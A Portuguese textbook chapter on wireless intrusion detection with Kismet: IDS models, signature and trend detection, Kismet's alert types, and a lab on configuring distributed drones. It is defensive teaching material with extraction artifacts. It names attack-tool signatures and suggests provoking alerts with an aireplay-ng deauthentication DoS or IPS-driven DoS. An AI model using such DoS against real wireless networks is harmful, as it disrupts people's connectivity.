Neste capítulo, serão apresentados conceitos importantes de Intrusion Detection System (IDS) no contexto de redes sem fio. Examinaremos conceitos básicos, modelos de implantação, métodos de detecção aplicáveis a redes 802.11 e características que devem ser consideradas na escolha e na elaboração de projeto de um IDS. Ao final, introduziremos o modelo de IDS que o Kismet implementa, com a interessante possibilidade de distribuição de sensores (Drones), que reportam a um servidor central. Essa introdução será importante para a atividade prática que se seguirá.

Sistemas de detecção de intrusos (IDS) em redes WLAN
11 Intrusion Detection System. 11 Extensão da tecnologia IDS para redes sem fio. 11 Monitoração da rede, em busca de sinais de abuso. 11 Sensores distribuídos, repositório central.

q

141

Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN

11 IDS distribuído com Kismet.

11 IDS rede sem fio (WIDS) versus IDS rede cabeada. 22 Camada 2. 22 Canais. Sistemas de Intrusion Detection System (IDS) em redes sem fio são uma extensão da tecno logia já empregada em redes cabeadas. Do ponto de vista de rede, a diferença entre redes

q

cabeadas e sem fio está na camada física, e é a monitoração nessa camada que nos interessa. A implantação de um IDS em uma rede cabeada depende do objetivo de monitoração, ou seja: monitorar a atividade da rede interna, monitorar ataques externos, entre outros. O perímetro da rede é controlável, englobando a localização física e o controle do acesso entre redes por firewalls. Redes sem fio têm suas peculiaridades: 11 Não possuem perímetro: pode parecer estranho à primeira vista, mas é possível afirmar que não há perímetro em redes sem fio, especialmente levando em conta o risco dos rogues; 11 Canais: em redes cabeadas, os sensores normalmente são distribuídos em interfaces que limitam zonas da rede. Já em redes sem fio, a monitoração normalmente ocorre por canal. É interessante que se monitore a maior quantidade possível de canais, inclusive os não utilizados pelas redes da organização; 11 Camada TCP/IP: IDS de uma rede sem fio deve inspecionar quadros de camada 2 – é isso que lhe confere a capacidade de detectar ataques DoS e outros específicos de redes 802.11. A integração com um IDS de camadas superiores pode ser feita, desde que se resolva a questão do tráfego cifrado; 11 Tráfego cifrado: nem sempre é possível direcionar o tráfego de camadas 3 e 4 para um IDS convencional, já que o payload dos quadros 802.11 de dados podem estar cifrados. Ao final do Capítulo 8, será introduzido o conceito de IDS distribuído com Kismet, ferra menta que já conhecemos por sua utilidade em auditorias; 11 WIDS: Wireless IDS.

Termos importantes
Evento de interesse para o analista. Falso-positivo: 11 Classificação incorreta de um alerta. 22 Alarme falso. Falso-negativo: 11 Classificação incorreta de um ataque. 22 Ausência de detecção. Sistemas de IDS normalmente são baseados em captura de tráfego, busca por assinaturas
Segurança em Redes sem Fio

q

conhecidas e alguma forma de alerta para o analista. Existem alguns termos essenciais na avaliação da eficiência de um IDS: 11 Evento de interesse (Event of Interest): evento que pode indicar a presença de um ata cante. No contexto de redes sem fio, podemos dar como exemplo a identificação de uma estação que esteja usando a ferramenta NetStumbler. É importante para se entender os motivos ou táticas de um atacante; 11 Falso-positivo: classificação incorreta de um alerta, normalmente indicando atividade maliciosa onde um IDS deve ter pouca incidência de falsos-positivos, uma vez que esse tipo de alarme falso faz com que analistas reajam e investiguem um ataque que não existe;

142

11 Falso-negativo: o oposto de falso-positivo: há um ataque em andamento, mas o IDS não é capaz de identificá-lo e, consequentemente, alertar o analista. Um falso-negativo é pior para a organização do que um falso-positivo e, normalmente, indica uma carência do IDS – não identificar corretamente tráfego fragmentado em pacotes, por exemplo – ou, o que é mais frequente, uma base de assinaturas desatualizada.

B as

e de Dados

Con figurações

Detector
Dados

Alarmes

Contramedidas Ações

Figura 8.1 Arquitetura genérica de um IDS.

Sistema

Modelos de implantação
Cobertura
11 Sensores dedicados. 22 Salta entre canais sem se preocupar com clientes conectados. 11 Necessidade de hardware dedicado. 22 Opção mais cara. 22 Complexo de gerenciar e implantar. 11 Opção que oferece mais funcionalidades. 11 Detecta ataques avançados.
Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN

q

22 Ajuda na resolução de problemas e monitoração de desempenho. Dois modelos podem ser adotados na implantação de um IDS: cobertura e integrada. No modelo “cobertura”, os sensores são dedicados e livres para trocar de canal. Eventualmente é possível estacionar em um canal que apresente atividade maliciosa. Essa liberdade de troca de canais é, ao mesmo tempo, a vantagem do modelo “cobertura” e a desvantagem do modelo “integrado” – pois saltar de canais é bom para monitoração, mas impede que o AP atenda à associação de clientes. A desvantagem desse modelo está em dois fatores: custo e complexidade de implantação. É necessário conduzir um estudo para se avaliar adequadamente a área de cobertura da rede. Outro fator importante é a necessidade de uma interface dedicada à monitoração, com o uso de outra interface – normalmente cabeada – para conexão com o servidor centralizado de gerência. Embora esse modelo seja o de maior custo, teremos condições de implantá-lo na atividade prática deste Capítulo 8. A relação entre a quantidade de clientes e Access Points, assim como a disponibilidade de um software de monitoração de qualidade superior e open source (Kismet) permite que experimentemos um modelo mais sofisticado de monitoração, com mais funcionalidades. A capacidade de operar em modo “monitor” – em que todo o tráfego de um dado canal, incluindo os de gerenciamento e controle, é capturado – aliado à possibilidade

143

de saltar entre canais e detectar 22 tipos de ataques conhecidos, confere para Kismet uma solução com recursos comparáveis aos de soluções comerciais.

Implantação integrada
11 APs existentes para monitoração. 11 Opção mais barata. 11 Administração mais simples que o modelo “cobertura”. 11 Varredura limitada. 22 Deve permanecer em um único canal para prover serviços.

q

Outro modelo de implantação disponível é o “integrado”, que usa os próprios Access Points da infraestrutura para monitoração da rede. É uma solução de baixo custo, mas exige que se utilize um equipamento que permita essa funcionalidade, porque é necessário que a interface sem fio seja capaz tanto de monitorar quanto de prover serviço de infraestrutura. Uma implantação de Kismet não é possível nesse modelo, a menos que se tenha um Access Point com duas interfaces de rede sem fio: uma em modo “monitor” – exigência de Kismet – e outra para prover associação para clientes. Diferente do modelo “cobertura”, sensores nesse modelo não são capazes de moni torar todos os canais, já que precisam permanecer em um único canal para prover conectividade para clientes.

Métodos de detecção
11 Análise de assinaturas. 11 Análise de tendências. 11 Análise de anomalias. 11 Análise individual dos pacotes: 22 Baseada em assinaturas. 22 Rápida e com poucos recursos. 11 Tipo mais comum de detecção. 11 Disponível no Kismet. 11 Detecta somente ataques conhecidos. 22 Necessidade de atualização frequente. 22 Possibilidade de falsos-positivos. Na análise por assinaturas, cada pacote capturado é analisado contra uma base de assina Segurança em Redes sem Fio

q

turas de ataques conhecidos. A vantagem dessa técnica é a velocidade de análise, permitindo que o sensor seja capaz de detectar ataques mesmo a altas taxas. O único fator limitante é a capacidade de processamento do dispositivo, que deve ser levada em conside ração quando a implementação dos sensores ocorre nos Access Points. A desvantagem é a incidência de falso-positivos (menor que na abordagem por anomalia) e a capacidade de detecção de apenas alguns tipos de ataque. É bom lembrar que outro fator importante que deve ser levado em conta em qualquer sistema que detecta ataques por assinatura, seja um IDS ou um antivírus, é a atualização frequente do banco de dados de assinaturas.

144

Kismet provê análise de pacotes por assinaturas para 12 tipos de ataques diferentes, como veremos mais adiante neste capítulo.

Análise de assinaturas
NetStumbler. 11 Probes contra um AP descoberto. 11 Mensagem típica incluída no payload. 22 3.2.0 “Flurbe gronk bloopit, bnip, Frundletrune”. 22 3.2.1 “All your 802.11b are belong to us”. 22 3.2.3 “Intentionally blank”. Um exemplo de ataque detectado por assinatura é a detecção de probes do NetStumbler.

q

w um nível de falso-positivo quase nulo.
Saiba mais em “Wellenreiter wireless penetration tool”: http://sourceforge.net/ projects/wellenreiter/

Essa ferramenta envia pacotes únicos, com cadeias de texto que identificam a atividade com

Outro exemplo de assinatura presente no Kismet é a detecção da atividade de outra ferramenta – Wellenreiter. Entre cada ataque de dicionário por força bruta, na tentativa de descobrir um SSID oculto, a ferramenta troca o SSID investigado para “this_is_used_for_wellenreiter” – o que permite que se identifique, com um certo grau de certeza, uma estação suspeita. De maneira semelhante, a ferramenta AirJack define “airjack” como SSID inicial.

Análise de tendências
11 Pode ser classificada como um subtipo de detecção por anomalia. 11 Identifica ataques avaliando dados coletados no decorrer do tempo. 11 Mecanismo mais útil. 22 Desvantagem: requer mais memória, mais processamento. 11 Disponível no Kismet.

q

Outro mecanismo de detecção de ataques disponível é a análise de tendências. Indicadores
Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN

que alimentam esse mecanismo podem ser: 11 Probes incomuns; 11 Desassociações em excesso; 11 Detecção de um AP trocando de canal: possível AP falso; 11 Detecção de clientes que apenas efetuam probes na rede, mas nunca se associam: ativi dade típica de ferramentas como NetStumbler. A desvantagem dessa técnica é o consumo significativamente maior de memória e processa mento necessários para análise. Esse pode ser um ponto de vulnerabilidade do IDS, já que o atacante pode tentar esgotar os recursos do sistema. O Kismet implementa esse tipo de análise e exige mais processamento e memória somente no servidor – o que diminui consideravelmente o risco de esgotamento de recursos no Access Point, por conta dessa análise. Trataremos mais adiante de dois tipos de ataques detectados pelo Kismet por esse tipo de análise.

Análise de anomalias
11 Alarme na ocorrência de eventos afastados significativamente de um comportamento

q

145

considerado normal. 22 Base de normalidade – baseline. 11 Requer um período anterior de observação da rede. 11 Identifica eventos anômalos que não condizem com a especificação IEEE 802.11. 11 Pouco implementada. 22 Não disponível no Kismet. O método por anomalia produz alarmes na ocorrência de eventos que se afastem signifi cativamente de um comportamento considerado normal (base de normalidade – baseline), porém, requer um período anterior de observação da rede para a formação da baseline. Basicamente, esse tipo de detecção considera suspeito um dado tráfego que não siga a especificação IEEE 802.11. A vantagem desse tipo de análise é a possibilidade de detecção de ataques novos, se compa rado com a análise contra assinaturas. Contudo, possui a desvantagem de gerar um grande índice de falsos-positivos.

Avaliando soluções de IDS
Características desejáveis: 11 Agregação de eventos. 11 Implantação simples. 11 Protocolo de comunicação seguro. 11 Intrusion Prevention System (IPS). 11 Integração com outro IDS. 22 Estender detecção à camada 3. Alguns recursos devem ser considerados, na avaliação de soluções de IDS para uma rede sem fio. Alguns deles: 11 Agregação de eventos: possibilidade de concentrar diversos eventos em um único alerta, facilitando o trabalho do analista. 11 Implantação simples: a configuração dos sensores de maneira centralizada, suporte a

q

PoE (Power over Ethernet) e detecção de sensores inativos tornam a implantação simples em ambientes mais complexos. 11 Protocolo de comunicação seguro: protocolos como Syslog, HTTP e SNMP devem ser evitados em favor de opções que não transmitam os dados monitorados em claro pela rede. 11 Intrusion Prevention System: possibilidade de integrar IDS com capacidade de reação ao promover ataques de DoS contra clientes que se conectem com APs rogue.
Segurança em Redes sem Fio

11 Integração com outros IDS: possibilidade de integração com um IDS de camada 3 e superiores. No caso de implantações de Kismet, é possível usar a saída da ferramenta e disparar um ataque DoS contra clientes que tentem se conectar com APs considerados rogue. Os riscos de evitar o acesso de clientes autênticos da rede e de afetar o funcionamento de redes vizinhas – organizações próximas – deve ser considerado. Com relação à integração com sistemas IDS tradicionais, é possível direcionar a saída de Kismet para um named pipe (opção “fifo” da configuração) e enviar o tráfego para uma ferra menta como Snort.

146

Essa opção, entretanto, é limitada para tráfego WEP, o único que Kismet é capaz de decifrar.

Características importantes
Dwell Time e Hop Time: 11 Tempo em que não há monitoração por troca de canais. Área de cobertura: 11 Quatro APs para cada sensor. Armazenamento e análise de tendências: 11 Possibilidade de análise mais elaborada com Excel e outras ferramentas. Alguns fatores são importantes e devem ser levados em consideração na implantação de um IDS:

q

11 Área de cobertura: sensores normalmente usam a rede cabeada para reportar o tráfego monitorado para o servidor centralizado e, por isso, não precisam transmitir. Assim, não existem as mesmas restrições de distância que afetam a implantação de APs. Portanto, é possível implantar sensores numa razão de 4:1, ou seja, 4 APs para cada sensor IDS; 11 Dwell time, Hop Time: o tempo gasto entre os saltos de canais (dwell time) e o tempo necessário para trocar de canal (hop time) devem ser levados em conta por serem fatores importantes. É possível que ataques aconteçam enquanto a rede não está sendo monitorada devido a um desses eventos. Soluções para esse problema são estabilizar em um canal em que se tenha detectado um ataque ou manter o maior número possível de sensores em canais estáticos; 11 Armazenamento e análise de tendências: armazenar os eventos de uma forma que seja recuperável facilmente: um banco de dados, por exemplo, possibilita análises posteriores com ferramentas de relatórios tais como Excel e Crystal Reports. Outro aspecto importante, no que diz respeito aos dados armazenados, é a segurança sob os dados armazenados, de forma que um atacante não seja capaz de apagar eventos de um ataque.

IDS distribuído com Kismet
11 Diversas funções: 22 Sniffer. 22 Detector de redes 802.11 de camada 2. 22 Sistema de detecção de intrusões (WIDS). 11 Modo RFMON: 22 Raw monitoring. 22 Tráfego 802.11a/b/g. 11 Coleta passiva de pacotes. 11 Drones: sensores remotos. Kismet agrega diversas funções: detector de redes sem fio 802.11 de camada 2, sniffer (captura de pacotes) e sistema de detecção de intrusões em redes sem fio (WIDS). Esta última funcionalidade nos interessa em especial.

q

147

Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN

O Kismet tem diversas opções de source, fontes de captura que são fontes de pacotes para análise. O tipo de fonte determina a maneira de capturar dados da interface: como mudar de canal, como entrar em modo RFMON. Por meio da interface de captura “kismet_drone”, é possível identificar o endereço IP e a porta do drone – termo usado para o sensor remoto do Kismet.

Drones Kismet
11 Normalmente servidor, sensor e interface gráfica no mesmo host. 11 IDS distribuído (escalabilidade). 22 Kismet Server: registros centralizados. 22 Kismet Drones em dispositivos remotos, possibilidade de captura de todos os canais simultaneamente. 11 Reportam dados coletados por uma interface secundária. 11 Normalmente pela rede cabeada. 11 Possibilidade de salto de canais diferentes. O uso de drones transforma Kismet em um IDS distribuído. Drones têm todo o suporte a

q

fontes de capturas do sensor normal, reportando por uma conexão secundária (normalmente, pela rede cabeada) para um servidor Kismet que armazena e analisa os pacotes coletados. Diversas configurações de varredura de canais são possíveis: diversos drones que moni toram canais distintos, poucos drones que varrem poucos canais ou apenas um drone que varre todos os canais. É importante lembrar aqui dos conceitos de dwell time e hop time: quanto menos se saltar entre canais, maior a cobertura do espectro e menor a possibilidade de perder o tráfego de um atacante. Devido aos poucos requisitos de processamento e memória, é possível instalar um Drone Kismet em um AP, que normalmente tem recursos escassos. É bom lembrar, entretanto, que, ao fazer isso com um AP SOHO (Small Office/Home Office) como os Linksys, o disposi tivo perde a funcionalidade de Access Point: com a interface sem fio em modo RFMON não é possível prover serviço de conexão para clientes. Na prática deste Capítulo 8, implantaremos uma infraestrutura simples de Drones Kismet instalados em APs reportando a um servidor central.

Alertas e detecção de intrusões
Vinte e dois tipos de alertas úteis para sensores estáticos. 11 Assinaturas (12 tipos). 22 Exemplo: versões específicas de NetStumbler. 11 Tendências (10 tipos).
Segurança em Redes sem Fio

q

22 Exemplo: desassociações excessivas, probes não usuais. Sem suporte à análise por anomalias. Possibilidade de integração com IDS de camada 3 e superiores. 11 Integração com Snort por named pipes. 11 Restrito para WEP (decodificação dos pacotes). Kismet provê detecção de ataques baseada em assinaturas e tendências, com foco na camada 2 (802.11). A integração com a camada 3 e superiores é possível através do uso de Snort com fonte de captura em um named pipe criado pelo Kismet. A configuração é simples:

148

w
Aprenda mais sobre Named Pipes e o Kismet. Acesse “Introduction to Named Pipes” em http://www2. linuxjournal.com/ article/2156 e “Kismet reader” em http://www. kismetwireless.net/ documentation. shtml#readme

11 Configura-se um Drone Kismet pelo arquivo de configuração kismet_drone.conf ; 11 Configura-se o Kismet Server de forma que uma das fontes de captura seja um Drone Kismet. O capture source em questão é o kismet_drone; 11 Acesso aos dados por um cliente Kismet, seja no mesmo host do servidor ou não. A integração com Snort é feita por named pipes e deve ser feita no host que hospeda o Kismet Server. Infelizmente, apenas tráfegos WEP ou não cifrados podem ser encaminhados para o Snort, uma vez que Kismet é capaz de decifrar em tempo real apenas esse tipo de tráfego. Os alertas foram desenvolvidos para sensores estáticos, ou seja, podem emitir alertas sem importância quando são utilizados sensores móveis em cenários de wardriving, por exemplo. A descrição das regras nos próximos slides se refere à versão Kismet-2006-04-R1.

Tipos de alerta – assinatura (12 tipos)
11 NETSTUMBLER: Probe requests NetStumbler. 11 LUCENTTEST: teste de link Lucent. 11 AIRJACKSSID: SSID “airjack”. 11 APSOOF: detecta tentativas de forjar o AP. 11 APSPOOF. 11 DHCPCLIENTID: DHCP DoS. 11 DISCONCODEINVALID: pacotes inválidos de solicitação de desconexão. 11 DEAUTHCODEINVALID: pacotes inválidos de solicitação de desautenticação. 11 LONGSSID: detecta solicitações de conexão SSIDs com nome maior que 32 bytes. 11 MSFBCOMSSID: detecta ataques a vulnerabilidade presente em alguns drivers broadcom para o SO Windows. 11 MSFDLINKRATE: detecta ataques a vulnerabilidade presente em alguns drivers D-Link para o SO Windows. 11 MSFNETGEARBEACON: detecta ataques a vulnerabilidade presente em alguns drivers Netgear para o SO Windows.

q

SSID IE tag de tamanho 0. 11 NETSTUMBLER : em tentativa de obter o SSID de uma rede, o NetStumbler envia pacotes que podem identificá-lo com uma baixa incidência de falsos-positivos; 11 LUCENTTEST: Lucent/Orinoco/Proxim/Agere fornecem um software de site survey. Kismet é capaz de identificar quando ele é utilizado; 11 AIRJACKSSID: as ferramentas AirJack definem “airjack” como SSID inicial, possibilitando detecção pelo Kismet; 11 APSOOF: uma lista de endereços MAC válidos para um determinado SSID pode ser passada através da opção “apspoof=”. Se for detectado na rede algum Beacon ou tentativa de conexão ao SSID monitorado, cujo MAC do AP não esteja na lista, um alerta é emitido; 11 DHCPCLIENTID: um cliente que enviar um pacote de DHCP DISCOVER contendo uma tag de Client-ID, que não bate com o MAC address de origem do pacote, pode estar tentando gerar uma negação de serviço contra o servidor DHCP;

149

Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN

11 NULLPROBERESP: detecta ataques a interfaces antigas, vulneráveis a pacotes com o

11 DISCONCODEINVALID/DEAUTHCODEINVALID: detecta pacotes de desconexão e/ou desautenticação que não possua códigos corretos para a razão da desconexão/desautenticação; 11 LONGSSID: a especificação 802.11 prevê um máximo de 32 bytes para o nome do SSID. SSIDs maiores que 32 bytes podem indicar tentativas de exploração de vulnerabilidades em drivers antigos; 11 MSFBCOMSSID: algumas versões de drivers da Broadcom para o SO Windows não mani pulam corretamente campos de SSID maiores que 32 bytes, podendo comprometer o sistema. Referência: WVE-2006-0071; 11 MSFDLINKRATE: algumas versões de drivers da D-Link para o SO Windows não mani pulam corretamente campos de SSID maiores que 32 bytes, podendo comprometer o sistema. Referência: WVE-2006-0072; 11 MSFNETGEARBEACON: algumas versões de drivers da Netgear para o SO Windows não manipulam corretamente campos de SSID maiores que 32 bytes, podendo comprometer o sistema; 11 NULLPROBERESP: pacotes de resposta a uma tentativa de conexão com a tag IE do SSID de tamanho 0, pode gerar falhas em placas antigas (prism2, orinoco, airport-classic). Referência: WVE-2005-0019.

Tipos de alerta – tendências (10 tipos)
11 DEAUTHFLOOD: Flood de desautenticação ou desassociação. 11 CHANCHANGE: AP previamente detectado em um novo canal. 11 PROBENOJOIN: Probes partindo de um cliente que nunca se associa. 11 DISASSOCTRAFFIC: tráfego de uma origem dentro de 10 segundos após desassociação. 11 BSSTIMESTAMP: Timestamps BSS inválidos, possível AP forjado. 11 CRYPTODROP: detecta um AP forjando um SSID com níveis mais baixos de segurança, visando obter credenciais de conexão dos usuários. 11 BCASTDISCON: detecta pacotes forjados de desassociação ou desconexão que podem gerar negação de serviço na rede sem fio. 11 DHCPNAMECHANGE/DHCPOSCHANGE: detecta tentativas de clonagem de MAC. 11 DHCPCONFLICT: detecta clientes que receberam um IP do servidor DHCP, porém trafegam utilizando outro IP. 11 DEAUTHFLOOD: detecção de ataque não persistente de DoS, em que o atacante forja pacotes de desassociação ou desautenticação;

q

11 CHANCHANGE: ataque do tipo Man In The Middle (MITM) no qual o atacante tenta dire cionar usuários para um AP falso com mesmo SSID de um AP da organização; 11 PROBENOJOIN: detecta atividade possivelmente maliciosa de clientes que fazem probes
Segurança em Redes sem Fio

por redes, mas que não se associam aos APs que responderam; 11 DISASSOCTRAFFIC: um host que se desassocia legitimamente não deveria trocar dados imediadamente depois. Qualquer cliente que troque dados dentro de 10 segundos após a desassociação da rede pode ser considerado vítima de um ataque de desassociação; 11 BSSTIMESTAMP: o timestamp BSS não pode ser forjado. Um timestamp BSS diferente é uma provável tentativa de forjar o BSSID ou SSID de um Access Point; 11 CRYPTODROP: detecta um AP que esteja configurado com um nível mais baixo de segu rança (por exemplo, um AP com WEP em uma rede WPA), pode ser utilizado para enganar um usuário e obter suas credenciais;

150

11 BCASTDISCON: detecta se algum host está enviando pacotes pacotes forjados de desau tenticação ou desasociação, o que pode gerar desconexão de todos clientes de uma rede Wi-Fi (DoS); 11 DHCPNAMECHANGE/DHCPOSCHANGE: o protocolo DHCP permite que o cliente informe seu hostname no pacote de Discover do DHCP. Esse nome somente deve ser alterado em situações drásticas (tipo um computador com dual-boot). A detecção dessa troca de hostname pode indicar uma tentativa de spoof ou de clone de MAC; 11 DHCPCONFLICT: um cliente que recebera um IP do servidor DHCP, porém trafega utili zando outro IP, pode indicar uma má configuração do cliente ou uma tentativa de spoof.

Prática de Kismet como IDS Distribuído
Drones Kismet: 11 Sniffers apenas. 11 Sensores remotos na razão 4:1. 11 Permite monitoramento de todos os canais simultaneamente. Servidor Kismet. 11 Armazenamento e análise centralizada. Clientes Kismet. 11 Local ou remoto. Na atividade prática ao final deste Capítulo, implantaremos um IDS distribuído no modelo

q

“cobertura”, ou seja, sensores dedicados à monitoração. Usaremos, para isso, todos os ele mentos da arquitetura de Kismet: 11 Kismet Server. 11 Kismet Client. 11 Kismet Drone. O objetivo da atividade é ter sensores abrangendo todos os canais de 802.11b/g, com o obje tivo final de detectar ataques e rogues.
Capítulo 8 - Sistemas de detecção de intrusões (IDS) em redes WLAN

151

152

Segurança em Redes sem Fio

Roteiro de Atividades 8
Na prática de reconhecimento da ferramenta Kismet, lidamos com uma infraestrutura com posta por Kismet Server e Kismet Client em operação no mesmo host. Existe um terceiro elemento, Kismet Drone, um software leve, que exerce apenas um papel: encaminhar os dados coletados para um Kismet Server remoto, como um sensor de detecção. Dessa forma, podemos criar uma infraestrutura com vários drones e um servidor Kismet recebendo os dados de diversas posições, com placas e canais diferentes, através da rede cabeada. O Kismet possui três arquivos de configuração: 11 kismet.conf : configuração do Kismet Server. 11 kismet_drone.conf : configuração do Drone. 11 kismet_ui.conf : configuração da Interface Gráfica do Cliente. Esses arquivos de configuração estão no diretório /usr/local/etc do BackTrack. Para a criação da infraestrutura, seguiremos os seguintes procedimentos sequenciais para minimizar a ocorrência de problemas de conexão entre servidor e drones: 11 Configuração das interfaces de rede cabeada com o endereçamento IP do laboratório. Anote os IPs de cada drone e do servidor; 11 Configuração dos drone s (edição do arquivo kismet_drone.conf ); 11 Configuração do Kismet Server (edição do arquivo kismet.conf em máquina selecionada pelo instrutor); 11 Ativação de apenas um drone; 11 Verificação do recebimento de pacotes do drone ativado, na interface de rede do servidor; 11 Ativação do Kismet Server, configurado para receber pacotes apenas do único drone ativado (editar kismet.conf ); 11 Verificação do funcionamento; 11 Desativação do Kismet Server (tecla Q); 11 # ifconfig wlan0 down 11 # ifconfig wlan0 up 11 Ativação dos demais drones; 11 Verificação do recebimento de pacotes dos drones ativados, na interface de rede do servidor; 11 Ativação do Kismet Server, configurado para receber pacotes dos demais drones ativados (editar kismet.conf ) que estão enviando pacotes; 11 Verificação do funcionamento.
Capítulo 8 - Roteiro de Atividades

153

Atividade 8.1 – Configurando o Kismet Drone
A configuração do drone é feita de maneira bem simples: bastam algumas alterações no arquivo kismet_drone.conf, em /usr/local/etc/ do seu BackTrack. Lembre-se de salvar o arquivo de configuração. 1. Altere para o endereço IP do Kismet Server ou pela máscara da rede, por exemplo:

allowedhosts=192.168.1.1
2. Altere o bindadress para o IP do cliente drone. Verifique o IP usando o comando ifconfig.

bindaddress=192.168.1.10
3. Defina a interface de captura do drone com canal inicial “1”:

source=rt73,wlan0,drone1,1
4. Configure a interface para não saltar entre canais:

channelhop=false

Atividade 8.2 – Configurando o Kismet Server
Como já mencionado, o Kismet Server pode receber dados não somente das interfaces de rede locais (que pode ser mais de uma), mas também de Kismet Drones remotos. Para configurar o Kismet Server para operar com drone s, inclua a seguinte linha no seu arquivo kismet.conf (em “/usr/local/etc/” ):

source=kismet_drone,192.168.1.10:3501,d1
Lembre-se de salvar o arquivo de configuração. Você pode configurar diversos drones – um para cada canal, por exemplo. A nomenclatura d1, por exemplo, pode indicar um drone que opera apenas no canal 1. Note que, uma vez que Kismet utiliza a interface WLAN em modo “monitor”, não é possível usá-la para associação. Assim, a comunicação entre Kismet Server e Drone normalmente ocorre por meio da rede cabeada. Agora, seu WIDS está pronto. Basta iniciar o Kismet Drone seguido do Kismet Server para visualizar os pacotes recebidos remotamente. No Kismet Drone, execute:

# ifconfig wlan0 down # rmmod rt73
Segurança em Redes sem Fio

# modprobe rt73
A interface Linksys WUSB54GC em especial normalmente exige que o módulo seja carre gado novamente para que a captura de Kismet (Server ou Drone) aconteça com sucesso.

154

Execute o comando kismet_drone, para acionar o Kismet Drone. Abaixo uma saída bem-sucedida:

bt etc # kismet_drone Suid priv-dropping disabled. This may not be secure. No specific sources given to be enabled, all will be enabled. Disabling channel hopping. Source 0 (drone1): Enabling monitor mode for rt73 source interface rausb0 channel 1 ... Source 0 (drone1): Opening rt73 source interface rausb0 ... Kismet Drone 2007.10.R1 (Kismet) Listening on port 3501 (protocol 9). Allowing connections from 127.0.0.1/255.255.255.255
No Kismet Server, inicie o Kismet pelas opções de aplicativos ou execute:

# kismet
Para mais informações e opções, veja:

# man kismet_drone # man kismet

Atividade 8.3 – Cobrindo todos os canais
Existem duas maneiras de varrer os canais: trocando de canais (hopping) ou monitorando o máximo de canais simultaneamente. Crie um WIDS com pelo menos três drones, de forma que cada um deles cuide de uma faixa de canais. Enumere pelo menos duas vantagens de se monitorar o máximo de canais simul taneamente (dica: dwell time). Se desejar que cada drone monitore apenas determinado canal (ex. 6), altere no arquivo kismet_drone.conf de cada um dos drones:

source=rt73,rausb0,drone1,1 source=rt73,rausb0,drone2,2 source=rt73,rausb0,drone3,3 source=rt73,rausb0,drone4,4
O nome que se dá ao source (drone1, drone2, neste caso) é irrelevante para a exibição no Kismet Client. O nome do source que aparece no painel do Kismet Client é configurado na linha source do arquivo kismet.conf . Para configurar drones que varrem todos os canais:
Capítulo 8 - Roteiro de Atividades

source=rt73,rausb0,drone1 channelhop=false

155

Atividade 8.4 – Alertas
O Kismet, atualmente, oferece 22 tipos de alertas diferentes que poderão ser visualizados na barra de alertas, na parte inferior da interface gráfica: 11 AIRJACKSSID; 11 APSPOOF; 11 BSSTIMESTAMP; 11 CHANCHANGE; 11 CRYPTODROP; 11 DEAUTHFLOOD; 11 BCASTDISCON; 11 DHCPCLIENTID; 11 DHCPCONFLICT; 11 DISASSOCTRAFFIC; 11 DISCONCODEINVALID; 11 DEAUTHCODEINVALID; 11 DHCPNAMECHANGE; 11 DHCPOSCHANGE; 11 LONGSSID; 11 LUCENTTEST; 11 SFBCOMSSID; 11 MSFDLINKRATE; 11 MSFNETGEARBEACON; 11 NETSTUMBLER; 11 NULLPROBERESP; 11 PROBENOJOIN. Provoque uma situação de alerta para seu WIDS recém-criado. Exemplos de ataque: Netstumbler – Ataque de DoS com Aireplay-ng.

156

Segurança em Redes sem Fio

9
Implantando uma WLAN segura (parte 1)
objetivos
Configurar um Access Point mais seguro com OpenWRT; configurar um AP comercial; WPA2 Enterprise com RADIUS, WPA2 e EAP-TLS como método EAP e certificados digitais para autenticação.

conceitos

WEP, WPA2 Personal (WPA2-PSK) e WPA2 Enterprise.

Introdução
11 Estudo de caso: Linksys WRT54GS. 11 AP mais seguro com OpenWRT. 11 Implantando uma WLAN básica no modelo Personal.

q

Neste capítulo, abordaremos a segurança no Access Point, especificamente nos dispositivos da marca Linksys série WRT54 – os mais populares do mercado SOHO (Small Office/Home Office).
Firmware Conjunto de instruções operacionais programadas diretamente no hardware de um equipamento eletrônico.

Introduziremos também uma opção muito interessante: a substituição do firmware do fabricante por um alternativo. O firmware escolhido para o estudo de caso alternativo foi o OpenWRT, por seus principais diferenciais, estabilidade e possibilidade de instalação RADIUS pela instalação do pacote FreeRADIUS, possibilitando a implantação de WPA/WPA2 Enterprise sem a necessidade de um servidor RADIUS externo. Outra funcionalidade que se destaca é a possibilidade de se implantar um Intrusion Detection System (IDS) específico para a camada 2 de 802.11 de forma distribuída, através da instalação de um Drone Kismet.
Capítulo 9 - Implantando uma WLAN segura (parte 1)

de pacotes. Esse último diferencial permite que o AP seja capaz de atuar como servidor

Segurança padrão no AP
Assim como outras opções de firmware (DD-WRT, por exemplo), OpenWRT oferece configu rações mais avançadas e flexíveis que o firmware original, tais como segmentação da rede, automatização de tarefas e ajuste da potência de transmissão, bem como administração remota segura por SSH (Secure Shell). Contudo, nem todos os APs suportam o upgrade, devendo-se, antes, verificar a compatibilidade com o firmware escolhido. Nas práticas subsequentes, configuraremos os APs com os firmwares comerciais já instalados.

157

Linksys e D-Link são padrão no mercado SOHO. Estudo de caso: Linksys WRT54GS. 11 Versão 3, Firmware v4.70.6. 11 802.11b/g com SpeedBooster/Afterburner. Administração: 11 Exclusivamente por interface web. 11 Suporte a HTTPS.

q

Figura 9.1 WRT54GS.

Linksys, juntamente com D-Link, podem ser considerados padrões no mercado SOHO (Small Office/Home Office). Essa característica, que os tornam acessíveis, juntamente com seus recursos, fizeram com que o WRT54GS fosse o AP escolhido para as práticas. A versão GS em particular possui uma diferença básica em relação à versão WRT54G: o recurso SpeedBooster/Afterburner. De acordo com o fabricante, com esse recurso é possível melhorar o desempenho de uma rede 802.11g em até 35%. Uma característica típica desse tipo de dispositivo é a presença de um servidor web embu tido para permitir o gerenciamento da unidade. Nesse modelo em particular essa é a única interface administrativa disponível de fábrica, que tem autenticação HTTP e suporte a HTTPS para proteger o tráfego que carrega a senha de acesso.

Segurança sem fio
WEP. 11 WEP-PSK (Personal). 11 Dynamic WEP, um “WEP Enterprise” com RADIUS/802.1x. WPA. 11 WPA-PSK (Personal). 11 Enterprise. WPA2 (802.11i). 11 Personal.
Segurança em Redes sem Fio

q

